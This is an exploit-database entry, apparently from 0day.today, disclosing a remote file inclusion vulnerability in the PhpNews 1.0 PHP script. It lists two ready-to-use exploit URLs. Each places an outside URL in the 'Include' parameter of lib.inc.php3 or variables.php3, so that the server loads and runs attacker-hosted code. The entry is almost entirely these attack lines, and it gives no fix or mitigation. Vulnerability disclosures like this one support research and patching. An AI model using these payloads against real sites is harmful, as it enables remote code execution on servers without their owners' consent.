id: 799
date: 09/06/2006
title: PhpNews 1.0 (Include) Remote File Include Vulnerabilities
author: the master
cves: 

=========================================================
PhpNews 1.0 (Include) Remote File Include Vulnerabilities
=========================================================



########################################################################
#  PhpNews v1.0  Remote File Inclusion Vulnerability
#
#  Download: ftp://ftp1.comscripts.com/PHP/36_phpnews-10.zip
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/Include/lib.inc.php3?Include=http://cmd.gif?
#  http://[Target]/[Path]/Include/variables.php3?Include=http://cmd.gif?
########################################################################



#  0day.today [2023-03-27]  #